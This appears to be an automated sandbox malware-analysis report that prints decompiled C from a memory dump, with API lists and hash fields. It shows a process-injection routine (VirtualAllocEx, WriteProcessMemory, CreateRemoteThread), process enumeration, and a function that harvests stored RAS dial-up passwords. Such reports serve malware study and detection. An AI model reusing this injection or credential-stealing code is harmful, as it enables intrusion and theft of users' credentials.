                                    0x00408c0d
                                    0x00408c12
                                    0x00408c13
                                    0x00408c13
                                    0x00408c13
                                    0x00408be1
                                    0x00408c20
                                    0x00408c23
                                    0x00408c31
                                    0x00408c3b
                                    0x00408c3b
                                    0x00408bb9
                                    0x00408b7d
                                    0x00408c42
                                    0x00408c45
                                    0x00408c48
                                    0x00408c50
                                    0x00408c58
                                    0x00408c60
                                    0x00408c68
                                    0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction ID: 55925fcc99f9e55126638c730d6fbe2105b7814248b5782dab5394ac9007a686
                                    • Opcode Fuzzy Hash: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction Fuzzy Hash: EE412470A442099BDB00EBA5C942BEEB7F8EF48704F54407EF540F72D1DB7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AF08, Relevance: 10.6, APIs: 7, Instructions: 70injectionmemorythreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E0040AF08(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				_Unknown_base(*)()* _v36;
				void* _t18;
				void* _t30;
				struct HINSTANCE__* _t32;
				void* _t35;
				long _t36;
				void* _t37;

				_v32 = __ecx;
				_v36 = __edx;
				_t30 = __eax;
				_v28 = 0;
				_t32 = GetModuleHandleA(0);
				_push(0);
				_push(_t32);
				asm("cdq");
				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
				asm("adc edx, [esp+0x4]");
				_t36 =  *(_t18 + 0x50);
				_t35 =  *(_t18 + 0x34);
				VirtualFreeEx(_t30, _t35, 0, 0x8000);
				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40);
				if(_t37 != 0) {
					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);
					if(_t36 <= _v24) {
						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
						CloseHandle(_t30);
						_v32 = _t37;
					}
				}
				return _v28;
			}














                                    0x0040af0f
                                    0x0040af13
                                    0x0040af16
                                    0x0040af1a
                                    0x0040af25
                                    0x0040af2b
                                    0x0040af2c
                                    0x0040af30
                                    0x0040af31
                                    0x0040af34
                                    0x0040af3b
                                    0x0040af3e
                                    0x0040af4a
                                    0x0040af5e
                                    0x0040af62
                                    0x0040af74
                                    0x0040af7d
                                    0x0040af95
                                    0x0040af9b
                                    0x0040afa0
                                    0x0040afa0
                                    0x0040af7d
                                    0x0040afaf

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                                    • String ID:
                                    • API String ID: 2398686212-0
                                    • Opcode ID: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction ID: ba714f15e26322d81a3db079e442bf4d00767b5fd8d80c8da630a050ea91888e
                                    • Opcode Fuzzy Hash: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction Fuzzy Hash: D71142B12443007FD210EE698C46F2BBBDCDFC5715F44882EB658E72D1D674E904876A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404E10, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00404E10() {

				if( *0x40e944 == 0) {
					 *0x40e944 = GetModuleHandleA("kernel32.dll");
					if( *0x40e944 != 0) {
						 *0x40e948 = GetProcAddress( *0x40e944, "CreateToolhelp32Snapshot");
						 *0x40e94c = GetProcAddress( *0x40e944, "Heap32ListFirst");
						 *0x40e950 = GetProcAddress( *0x40e944, "Heap32ListNext");
						 *0x40e954 = GetProcAddress( *0x40e944, "Heap32First");
						 *0x40e958 = GetProcAddress( *0x40e944, "Heap32Next");
						 *0x40e95c = GetProcAddress( *0x40e944, "Toolhelp32ReadProcessMemory");
						 *0x40e960 = GetProcAddress( *0x40e944, "Process32First");
						 *0x40e964 = GetProcAddress( *0x40e944, "Process32Next");
						 *0x40e968 = GetProcAddress( *0x40e944, "Process32FirstW");
						 *0x40e96c = GetProcAddress( *0x40e944, "Process32NextW");
						 *0x40e970 = GetProcAddress( *0x40e944, "Thread32First");
						 *0x40e974 = GetProcAddress( *0x40e944, "Thread32Next");
						 *0x40e978 = GetProcAddress( *0x40e944, "Module32First");
						 *0x40e97c = GetProcAddress( *0x40e944, "Module32Next");
						 *0x40e980 = GetProcAddress( *0x40e944, "Module32FirstW");
						 *0x40e984 = GetProcAddress( *0x40e944, "Module32NextW");
					}
				}
				if( *0x40e944 == 0 ||  *0x40e948 == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                    0x00404e19
                                    0x00404e29
                                    0x00404e2e
                                    0x00404e41
                                    0x00404e53
                                    0x00404e65
                                    0x00404e77
                                    0x00404e89
                                    0x00404e9b
                                    0x00404ead
                                    0x00404ebf
                                    0x00404ed1
                                    0x00404ee3
                                    0x00404ef5
                                    0x00404f07
                                    0x00404f19
                                    0x00404f2b
                                    0x00404f3d
                                    0x00404f4f
                                    0x00404f4f
                                    0x00404e2e
                                    0x00404f57
                                    0x00404f65
                                    0x00404f66
                                    0x00404f69
                                    0x00404f69

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00405097,?,00000000,0040520D,00000000,004052C4), ref: 00404E24
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00404E3C
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 00404E4E
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404E60
                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00404E72
                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00404E84
                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 00404E96
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00404EA8
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00404EBA
                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00404ECC
                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00404EDE
                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404EF0
                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404F02
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404F14
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404F26
                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404F38
                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 00404F4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                    • API String ID: 667068680-597814768
                                    • Opcode ID: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction ID: fe5771f8beb9365a204d6e2904ce85914b9e0a1e64c90e6c75949bdee210121a
                                    • Opcode Fuzzy Hash: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction Fuzzy Hash: D531D7F0A01710ABEB60AFB69986A2A3BA8EB857057140D77B100FF2D5C67D8D508B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040822C, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 304COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E0040822C(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a82) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				struct _OSVERSIONINFOA _v200;
				char _v476;
				char _v733;
				char _v1248;
				char _v1252;
				signed int _v3020;
				signed int _v3024;
				signed int _v3028;
				signed int _v3032;
				signed int _v3036;
				char _v3284;
				char _v3288;
				char _v3292;
				signed int _v3296;
				signed int _v3300;
				intOrPtr* _t114;
				void* _t131;

				_push(__ebx);
				_push(__edx | _a82);
				asm("popad");
				if(__ecx + 1 < 0) {
					_t131 = __eax;
					_t114 = E0040806C("RasGetEntryProperties", __ebx, __eax);
					return  *_t114(_t131, __edi, _v4, _a16, _a12, _a8);
				} else {
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp + 0xfffff328;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__edx = 0;
					_v3296 = 0;
					_v3300 = 0;
					_v3036 = 0;
					_v3032 = 0;
					_v32 = 0;
					_v36 = 0;
					_v40 = 0;
					_v48 = 0;
					_v52 = 0;
					_v56 = 0;
					_v16 = __eax;
					__eax = 0;
					_push(__ebp);
					_push(0x40861b);
					_push( *[fs:eax]);
					 *[fs:eax] = __esp;
					_v16 = E00401AC0(_v16);
					_v28 = E00407FF0();
					__eflags = _v28;
					if(_v28 != 0) {
						__eax = _v20;
						_push(_v20);
						__eax =  &_v24;
						__ecx = 1;
						__edx =  *0x408214; // 0x408218
						__eax = E00402FBC();
						__esp = __esp + 4;
						__edx = _v24;
						__eax = 0x108;
						 *_v24 = 0x108;
						__edx = 0x108 * _v20 >> 0x20;
						__eax = 0x108 * _v20;
						_v12 = 0x108 * _v20;
						__eax =  &_v20;
						_push( &_v20);
						__eax =  &_v12;
						_push( &_v12);
						__eax = _v24;
						_push(__eax);
						_push(0);
						_push(0);
						L00407B84();
						__eflags = __eax;
						if(__eax == 0) {
							_v200.dwOSVersionInfoSize = 0x94;
							 &_v200 = GetVersionExA( &_v200);
							__eax =  &_v28;
							__edx = 0x105;
							__eax = E00402074( &_v28, 0x105);
							__eax =  &_v32;
							__edx = 0x105;
							__eax = E00402074( &_v32, 0x105);
							__eflags = _v200.dwPlatformId - 2;
							if(_v200.dwPlatformId == 2) {
								__eflags = _v200.dwMajorVersion - 5;
								if(_v200.dwMajorVersion >= 5) {
									_push(0);
									_push(0x1a);
									__eax =  &_v28;
									__eax = E00401F9C( &_v28);
									_push(__eax);
									_push(0);
									L00407B7C();
									__eflags = __eax;
									if(__eflags != 0) {
										__edx =  &_v3024;
										_v28 = E00407F4C(_v28,  &_v3024, __eflags);
										__edx = _v3024;
										 &_v28 = E00401B58( &_v28, _v3024);
									}
									_push(0);
									_push(0x23);
									__eax =  &_v32;
									__eax = E00401F9C( &_v32);
									_push(__eax);
									_push(0);
									L00407B7C();
									__eflags = __eax;
									if(__eflags != 0) {
										__edx =  &_v3028;
										_v32 = E00407F4C(_v32,  &_v3028, __eflags);
										__edx = _v3028;
										 &_v32 = E00401B58( &_v32, _v3028);
									}
									__eax = E00407E40(__ebx, __ecx, __edi, __esi, __eflags);
								}
							}
							_v36 = 0xffffffff;
							__eax = _v20;
							__eax = _v20 - 1;
							__eflags = __eax;
							if(__eax >= 0) {
								_v52 = __eax;
								__esi = 0;
								__eflags = 0;
								do {
									_v1252 = 0x41c;
									__esi = __esi << 5;
									__ebx = (__esi << 5) + __esi;
									__eax = _v24;
									__eax = _v24 + 4 + __ebx * 8;
									__edx =  &_v1248;
									__ecx = 0x100;
									E00401258(_v24 + 4 + __ebx * 8, 0x100,  &_v1248) =  &_v36;
									_push( &_v36);
									__eax =  &_v1252;
									_push( &_v1252);
									_push(0);
									L00407B8C();
									_v12 = 0x6e8;
									__eax =  &_v3020;
									__ecx = 0;
									__edx = _v12;
									E00401414( &_v3020, _v12) = _v12;
									_v3020 = _v12;
									 &_v12 =  &_v16;
									__eax = _v24;
									__edx = _v24 + 4 + __ebx * 8;
									__ecx =  &_v3020;
									0 = E004081BC(0, _v24 + 4 + __ebx * 8,  &_v16, 0,  &_v12);
									__eflags = _v200.dwPlatformId - 2;
									if(_v200.dwPlatformId == 2) {
										__eflags = _v200.dwMajorVersion - 5;
										if(_v200.dwMajorVersion >= 5) {
											__eax = _v28;
											__eflags =  *_v28;
											if( *_v28 != 0) {
												L17:
												__eax =  &_v40;
												__edx =  &_v1248;
												__eax = E00401CAC( &_v40,  &_v1248);
												__edx =  &_v44;
												_v40 = E00403268(_v40, __ebx, __ecx,  &_v44, __esi, __eflags);
												 &_v28 = E00401F9C( &_v28);
												__eax = _v40;
												__eax = E00401F48(_v40);
												__edi = __eax;
												__ebx = __eax;
												__eflags = __ebx;
												if(__ebx == 0) {
													__eax =  &_v32;
													__eax = E00401F9C( &_v32);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx == 0) {
													 &_v28 = E00401F9C( &_v28);
													__eax = _v44;
													__eax = E00401F48(_v44);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx == 0) {
													 &_v32 = E00401F9C( &_v32);
													__eax = _v44;
													__eax = E00401F48(_v44);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx > 0) {
													__eax = __ebx;
													__edx = 0;
													__eflags = 0;
													 &_v3284 = E00402BC0( &_v3284, __ebx, 0);
													__edx =  &_v3284;
													 &_v48 = E00401D18( &_v48,  &_v3284, __eflags);
													__edi = 0x100;
													__ebx = 0x40e9bc;
													do {
														__eax =  *__ebx;
														__edx = _v48;
														__eax = E00401E94( *__ebx, _v48);
														if(__eflags == 0) {
															__eflags =  *(__ebx + 4);
															if( *(__ebx + 4) != 0) {
																_t92 = __ebx + 4; // 0x0
																__eax =  *_t92;
																_push(E00401D50( *_t92));
																_t93 = __ebx + 4; // 0x0
																__eax =  *_t93;
																__edx = E00401F48( *_t93);
																__eax =  &_v476;
																_pop(__ecx);
																__eax = E00408038( &_v476, __ecx, __edx);
															}
														}
														__ebx = __ebx + 8;
														__edi = __edi - 1;
														__eflags = __edi;
													} while (__edi != 0);
												}
											} else {
												__eax = _v32;
												__eflags =  *_v32;
												if( *_v32 != 0) {
													goto L17;
												}
											}
										}
									}
									__eax =  &_v733;
									__eflags =  &_v733;
									if( &_v733 != 0) {
										__eax =  &_v476;
										__eflags =  &_v476;
										if( &_v476 != 0) {
											__eax = _v8;
											_push( *_v8);
											_push("RAS Passwords |");
											__eax =  &_v3288;
											__edx =  &_v733;
											__eax = E00401CAC( &_v3288,  &_v733);
											_push(_v3288);
											_push(0x40865c);
											__eax =  &_v3292;
											__edx =  &_v476;
											__eax = E00401CAC( &_v3292,  &_v476);
											_push(_v3292);
											_push(0x40865c);
											_push(0x408668);
											__eax = _v8;
											__edx = 7;
											E00401E10();
										}
									}
									__esi = __esi + 1;
									_t105 =  &_v52;
									 *_t105 = _v52 - 1;
									__eflags =  *_t105;
								} while ( *_t105 != 0);
							}
						}
					}
					__eax = 0;
					__eflags = 0;
					_pop(__edx);
					_pop(__ecx);
					_pop(__ecx);
					 *[fs:eax] = __edx;
					_push(E00408622);
					__eax =  &_v3292;
					__edx = 2;
					__eax = E00401AE4( &_v3292, 2);
					__eax =  &_v3028;
					__edx = 2;
					__eax = E00401AE4( &_v3028, 2);
					__eax =  &_v48;
					__edx = 3;
					__eax = E00401AE4( &_v48, 3);
					__eax =  &_v32;
					__edx = 2;
					__eax = E00401AE4( &_v32, 2);
					__eax =  &_v24;
					__edx =  *0x408214; // 0x408218
					return E00402FC8( &_v24, __edx);
				}
			}


































                                    0x00408230
                                    0x00408231
                                    0x00408232
                                    0x00408234
                                    0x004081c8
                                    0x004081cf
                                    0x004081ef
                                    0x00408238
                                    0x00408238
                                    0x00408239
                                    0x0040823b
                                    0x00408241
                                    0x00408242
                                    0x00408243
                                    0x00408244
                                    0x00408246
                                    0x0040824c
                                    0x00408252
                                    0x00408258
                                    0x0040825e
                                    0x00408261
                                    0x00408264
                                    0x00408267
                                    0x0040826a
                                    0x0040826d
                                    0x00408270
                                    0x00408273
                                    0x00408275
                                    0x00408276
                                    0x0040827b
                                    0x0040827e
                                    0x00408284
                                    0x0040828e
                                    0x00408291
                                    0x00408295
                                    0x0040829b
                                    0x0040829e
                                    0x0040829f
                                    0x004082a2
                                    0x004082a7
                                    0x004082ad
                                    0x004082b2
                                    0x004082b5
                                    0x004082b8
                                    0x004082bd
                                    0x004082bf
                                    0x004082bf
                                    0x004082c2
                                    0x004082c5
                                    0x004082c8
                                    0x004082c9
                                    0x004082cc
                                    0x004082cd
                                    0x004082d0
                                    0x004082d1
                                    0x004082d3
                                    0x004082d5
                                    0x004082da
                                    0x004082dc
                                    0x004082e2
                                    0x004082f3
                                    0x004082f8
                                    0x004082fb
                                    0x00408300
                                    0x00408305
                                    0x00408308
                                    0x0040830d
                                    0x00408312
                                    0x00408319
                                    0x0040831b
                                    0x00408322
                                    0x00408324
                                    0x00408326
                                    0x00408328
                                    0x0040832b
                                    0x00408330
                                    0x00408331
                                    0x00408333
                                    0x00408338
                                    0x0040833a
                                    0x0040833c
                                    0x00408345
                                    0x0040834a
                                    0x00408353
                                    0x00408353
                                    0x00408358
                                    0x0040835a
                                    0x0040835c
                                    0x0040835f
                                    0x00408364
                                    0x00408365
                                    0x00408367
                                    0x0040836c
                                    0x0040836e
                                    0x00408370
                                    0x00408379
                                    0x0040837e
                                    0x00408387
                                    0x00408387
                                    0x0040838c
                                    0x0040838c
                                    0x00408322
                                    0x00408391
                                    0x00408398
                                    0x0040839b
                                    0x0040839c
                                    0x0040839e
                                    0x004083a5
                                    0x004083a8
                                    0x004083a8
                                    0x004083aa
                                    0x004083aa
                                    0x004083b6
                                    0x004083b9
                                    0x004083bb
                                    0x004083be
                                    0x004083c2
                                    0x004083c8
                                    0x004083d2
                                    0x004083d5
                                    0x004083d6
                                    0x004083dc
                                    0x004083dd
                                    0x004083df
                                    0x004083e4
                                    0x004083eb
                                    0x004083f1
                                    0x004083f3
                                    0x004083fb
                                    0x004083fe
                                    0x0040840a
                                    0x0040840e
                                    0x00408411
                                    0x00408415
                                    0x0040841d
                                    0x00408422
                                    0x00408429
                                    0x0040842f
                                    0x00408436
                                    0x0040843c
                                    0x0040843f
                                    0x00408442
                                    0x00408450
                                    0x00408450
                                    0x00408453
                                    0x00408459
                                    0x0040845e
                                    0x00408464
                                    0x0040846c
                                    0x00408479
                                    0x0040847c
                                    0x00408481
                                    0x00408489
                                    0x0040848b
                                    0x0040848d
                                    0x0040848f
                                    0x00408492
                                    0x004084a5
                                    0x004084a5
                                    0x004084a7
                                    0x004084a9
                                    0x004084ae
                                    0x004084bb
                                    0x004084be
                                    0x004084c9
                                    0x004084c9
                                    0x004084cb
                                    0x004084cd
                                    0x004084d2
                                    0x004084df
                                    0x004084e2
                                    0x004084ed
                                    0x004084ed
                                    0x004084ef
                                    0x004084f1
                                    0x004084f3
                                    0x004084f5
                                    0x004084f5
                                    0x004084ff
                                    0x00408504
                                    0x0040850d
                                    0x00408512
                                    0x00408517
                                    0x0040851c
                                    0x0040851c
                                    0x0040851e
                                    0x00408521
                                    0x00408526
                                    0x00408528
                                    0x0040852c
                                    0x0040852e
                                    0x0040852e
                                    0x00408536
                                    0x00408537
                                    0x00408537
                                    0x0040853f
                                    0x00408541
                                    0x00408547
                                    0x00408548
                                    0x00408548
                                    0x0040852c
                                    0x0040854d
                                    0x00408550
                                    0x00408550
                                    0x00408550
                                    0x0040851c
                                    0x00408444
                                    0x00408444
                                    0x00408447
                                    0x0040844a
                                    0x00000000
                                    0x00000000
                                    0x0040844a
                                    0x00408442
                                    0x00408436
                                    0x00408553
                                    0x00408559
                                    0x0040855b
                                    0x0040855d
                                    0x00408563
                                    0x00408565
                                    0x00408567
                                    0x0040856a
                                    0x0040856c
                                    0x00408571
                                    0x00408577
                                    0x0040857d
                                    0x00408582
                                    0x00408588
                                    0x0040858d
                                    0x00408593
                                    0x00408599
                                    0x0040859e
                                    0x004085a4
                                    0x004085a9
                                    0x004085ae
                                    0x004085b1
                                    0x004085b6
                                    0x004085b6
                                    0x00408565
                                    0x004085bb
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004083aa
                                    0x0040839e
                                    0x004082dc
                                    0x004085c5
                                    0x004085c5
                                    0x004085c7
                                    0x004085c8
                                    0x004085c9
                                    0x004085ca
                                    0x004085cd
                                    0x004085d2
                                    0x004085d8
                                    0x004085dd
                                    0x004085e2
                                    0x004085e8
                                    0x004085ed
                                    0x004085f2
                                    0x004085f5
                                    0x004085fa
                                    0x004085ff
                                    0x00408602
                                    0x00408607
                                    0x0040860c
                                    0x0040860f
                                    0x0040861a
                                    0x0040861a

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |$RasGetEntryProperties
                                    • API String ID: 606077693-541967613
                                    • Opcode ID: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction ID: 6468358b1ab4b7f73c56054985f5742c7a8c8687d669c1df658abded6e8fa1dc
                                    • Opcode Fuzzy Hash: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction Fuzzy Hash: 88C10F70A002199FDB10EBA5CD81BDEB7B9EF44308F1045BBE544B72D1DB78AE458B68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408238, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 277COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00408238(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOA _v200;
				char _v476;
				char _v733;
				char _v1248;
				char _v1252;
				signed int _v3020;
				char _v3024;
				char _v3028;
				char _v3284;
				char _v3288;
				char _v3292;
				char _t130;
				void* _t138;
				CHAR* _t167;
				void* _t181;
				CHAR* _t185;
				CHAR* _t190;
				void* _t199;
				void* _t201;
				int _t215;
				intOrPtr* _t216;
				signed int* _t222;
				void* _t223;
				intOrPtr _t225;
				intOrPtr _t230;
				CHAR* _t253;
				void* _t254;
				signed int _t256;
				void* _t259;

				_t255 = __esi;
				_t252 = __edi;
				_t211 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v3288 = 0;
				_v3292 = 0;
				_v3028 = 0;
				_v3024 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v8 = __eax;
				_push(_t259);
				_push(0x40861b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t259 + 0xfffff328;
				E00401AC0(_v8);
				_v20 = E00407FF0();
				if(_v20 != 0) {
					_push(_v20);
					E00402FBC();
					 *_v24 = 0x108;
					_v12 = 0x108 * _v20;
					_push( &_v20);
					_push( &_v12);
					_t130 = _v24;
					_push(_t130);
					_push(0);
					_push(0);
					L00407B84();
					if(_t130 == 0) {
						_v200.dwOSVersionInfoSize = 0x94;
						GetVersionExA( &_v200);
						E00402074( &_v28, 0x105);
						E00402074( &_v32, 0x105);
						if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
							_push(0);
							_push(0x1a);
							_t199 = E00401F9C( &_v28);
							_push(_t199);
							_push(0);
							L00407B7C();
							_t267 = _t199;
							if(_t199 != 0) {
								E00407F4C(_v28,  &_v3024, _t267);
								E00401B58( &_v28, _v3024);
							}
							_push(0);
							_push(0x23);
							_t201 = E00401F9C( &_v32);
							_push(_t201);
							_push(0);
							L00407B7C();
							_t268 = _t201;
							if(_t201 != 0) {
								E00407F4C(_v32,  &_v3028, _t268);
								E00401B58( &_v32, _v3028);
							}
							E00407E40(_t211, 1, _t252, _t255, _t268);
						}
